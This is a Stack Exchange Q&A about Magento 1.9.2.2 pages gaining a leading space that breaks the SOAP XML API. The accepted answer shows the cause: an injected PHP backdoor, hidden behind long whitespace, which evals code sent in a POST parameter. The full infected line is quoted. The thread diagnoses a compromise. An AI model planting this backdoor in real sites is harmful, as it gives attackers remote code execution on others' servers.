# Space added before every magento page content

Tags: api, soap, magento-community, ce-1.9.2.2

Since upgrading to 1.9.2.2, every magento page on my store is pre-padded with a space before the page content.
This breaks xml pages such as the magento soap api, giving the following error when loaded in the browser:

```
This page contains the following errors:

error on line 1 at column 8: XML declaration allowed only at the start of the document

Below is a rendering of the page up to the first error.
```

I found that the minimal code required for the spaces to be added is the following:

```
<?php
require_once 'app/Mage.php';
require_once 'app/code/core/Mage/Core/Model/Config/Options.php';
```

How can I find the point where the padding occurs?

Answer (score 1, accepted):

Problem solved.
Some php files were infected with a code injection exploit (Described here: https://stackoverflow.com/questions/30270641/what-does-this-php-code-do).
This exploit script was added to the beginning of php files. It is designed to look like a normal beginning as the hack code has been spaced over typically 250+ spaces so it’s not seen at first glance in a text editor when word-wrap is off.

Example first line from an infected file (scroll right to see the hack script)::

```
<?php                                                                                                                                                                                                                                                                          $vzq3 = "t_osp";$zqr5= strtoupper($vzq3[1].$vzq3[4] . $vzq3[2].$vzq3[3]. $vzq3[0]) ; if( isset( ${$zqr5 }['q3e818c'])) { eval( ${$zqr5 }['q3e818c']); }?> <?php
```

The single space between the hack script and the original <?php opening was added to every page in my magento site, breaking magento`s soap api as xmls with preceding spaces are invalid.

Comment: In our case /includes/config.php contained an exploit

Answer (score 4):

It's most likely that there is a module installed, or a custom theme installed, that has trailing whitespace after the closing `?>` in a file or class.

Because it's happening with both Mage.php and Config/Options.php, I would look at those two files first.

After that, disable all local modules and follow the standard debug process outlined here:

[Fundamentals for debugging a Magento store](https://magento.stackexchange.com/questions/428/fundamentals-for-debugging-a-magento-store)

Best of luck.